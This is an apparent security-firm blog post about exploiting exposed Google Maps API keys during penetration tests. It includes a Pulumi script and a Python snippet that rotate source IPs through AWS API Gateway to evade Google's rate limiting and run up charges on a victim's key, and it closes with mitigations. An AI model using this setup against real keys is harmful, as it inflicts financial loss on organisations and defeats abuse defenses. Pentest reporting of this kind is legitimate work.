How To Increase the Impact of An Exposed Google Maps API Key Issue

Word Ahead

GMAPS API Key is a paid service that allows applications to embed & search from the Google Maps Database and use it on their applications. To consume those Google services, the organizations need to use an API key.

The standard price of using Google API Key for Static Map services is $2 per one thousand requests. Other services have a higher price per the following visual example taken from the Google official website.



This API key is public and easily discoverable by any Internet user. Also, it can carry out several security configurations such as over permissive usage rights. As with the other services consumed in the Cloud, it is the organization's technical team's role to be aware of its defaults, assess, and tweak them based on the current organization's needs.

Unfortunately, that is not the case in most situations. There is no impact on customer data, confidentiality, or integrity because the keys are overly permissive and lack proper security boundaries. Google does not consider this a bug, but rather a misconfiguration of the service on the user's side.

The Vulnerability

Ozgur Alp, a Turkish cybersecurity researcher, first discovered the vulnerability and published it along with an open-source scanner code. However, after almost two years have passed since the details of this finding were initially released, we consider this finding to be reasonably underrated.

Proof-Of-Concept

To add more value to the final penetration test results, we developed an add-on concept that can be easily integrated into the detection and attack flow. We have gone above and beyond to provide more than a simple confirmation that the key is 'Vulnerable' or not, and to provide proof of concept to the client that he can reuse and used to understand this issue's impact based on his business model.

Attack Scenario

The overall economics of this attack consists of the ability of someone toabuse the API key and send millions of requests without getting blocked by the Google's backend.

Our original plan was to come up with a reusable PoC scenario and make sure that every client who was affected by this issue could use and understand the attack vector. Because this issue has a financial impact, we felt that the PoC should be tested by the organization's own teams.

It is worth to be mentioned that the Google API Service backend detects and blocks any short API key abuse firsthand, the whole defense is working based on the source IP address, meaning that using a large source IP addresses pool will bypass this primary line of defense.

It is worth mentioning that Google detects and blocks any short API key abuse firsthand. The whole defense works based on the source IP address, meaning that using a large source IP address pool will bypass this primary line of defense.

And here is where the AWS gets helpful because the API Gateway will automatically rotate the source IP address for us, and every request will have a different source IP address.

So, we decided to use two basic features that AWS has, an EC2 instance behind an AWS API Gateway. The concept of using this and avoiding IP restrictions is not new, and it has been well documented by others (check the References section). Not a novel exploit here, but a workaround often used to defeat rate limit defenses.

And finally, before jumping into the technical side of things, here's the “complex” high-level design architecture of this idea.

Proof-of-Concept

Any of the big three cloud providers now allow you to use Infrastructure-as-a-Code to deploy and reuse custom architecture. Although some might prefer Terraform, we decided to use the Pulumi tool for infrastructure as code instead. Some people prefer the Hashicorp scripting approach, but others are happy with the Python way. That's where this option comes in handy.

Prerequisites

1. Install Pulumi: https://www.pulumi.com/docs/get-started/install/

2. Configure AWS credentials: https://www.pulumi.com/docs/intro/cloud-providers/aws/setup/

3. Create a project with

---------------------------------------------------------------------------
pulumi new aws-python --name (You actually may have to login into Pulumi)
---------------------------------------------------------------------------

4. Open __main__.py and replace the contents with the ones in this __main__.py

The (Pulumi) Script

---------------------------------------------------------------------------
import pulumi
import pulumi_aws as aws
size = 't2.micro'
ami = aws.get_ami(most_recent="true",
    owners=["your_aws_account_12_digits_number"],
    filters=[{"name":"name","values":["gmaps-api-demo"]}])
group = aws.ec2.SecurityGroup('maps-secgrp', description='Enable SSH access',
ingress=[
 { 'protocol': 'tcp', 'from_port': 22, 'to_port': 22, 'cidr_blocks': ['your_external_ip/32'] }
])
server = aws.ec2.Instance('Google-API-Cannon', instance_type=size,
vpc_security_group_ids=[group.id], # reference security group from above ami=ami.id)
pulumi.export('publicIp', server.public_ip)
pulumi.export('publicHostName', server.public_dns)
---------------------------------------------------------------------------

5. Run Pulumi up to preview and update your infrastructure - check the AWS account to see the instance

• 5.1. Run Pulumi destroy to clean up your resources.
  
  
• 5.2. Run Pulumi stack rm to delete your stack.
  
  

6. SSH into the fresh new EC2 instance and run the following commands:

• 6.1. - git clone the scanner
  
  
• 6.2. - python3 -m pip install requests
  
  
• 6.3. - python3 -m pip install requests-ip-rotator
  
  
• 6.4. - aws configure to use the AWS API Gateway
  
  
• 6.5. - check if the GMAPS API KEY is vulnerable or not
  
  

---------------------------------------------------------------------------
python3 maps_api_scanner_python3.py
---------------------------------------------------------------------------

• 6.5.1. If the API Key is reported vulnerable, then copy the attack vector direct link details. Under this circumstance, it is a simple GET request towards Google Gmaps backend.
  
  
• 6.5.2 For a simpler proof of concept, you can use the request-ip-rotator Python library.
  
  

This is an example of a Python script that uses the AWS API Gateway to send GET requests to a website.

---------------------------------------------------------------------------
import requests
from requests_ip_rotator import ApiGateway

with ApiGateway("target_affected_service_url") as g:
 session = requests.Session()
 session.mount("target_affected_service_url", g)

 # consider this only if you are interested in potentially log stuff or for debugging purposes

 response = session.get("target_affected_service_url")
 print(response.status_code)
---------------------------------------------------------------------------

Impact

An organization's Google Maps API Key can be hijacked and used by someone else or abused for a (limited) financial loss damage.

From what we know, Google's current billing behavior is to send invoices that sum up a total fee including all other services like Google Enterprise CAPTCHA API Key consumption, without providing a breakdown of costs. This could lead to anomalies being easily missed by the procurement department.

Workarounds

- Restrict the API key features access down to the only ones agreed with the business side.

- Consider contacting Google Support, who, although acknowledges the issue, has yet to provide clear guidance about how to protect you against potential abuse scenarios.

- At last, but not least, record this issue within the organization's Internal Risk Assessment registry.

Aknowledgements | References | Resources

Legal Statement

The information in this blog post is provided for research and educational purposes only. Whilst every effort has been made to ensure that the information contained in this document is true and correct at the time of publication, Syn Cubes, Inc. accepts no liability in any form whatsoever for any direct or indirect damages arising or resulting from the use of or reliance on the information contained herein.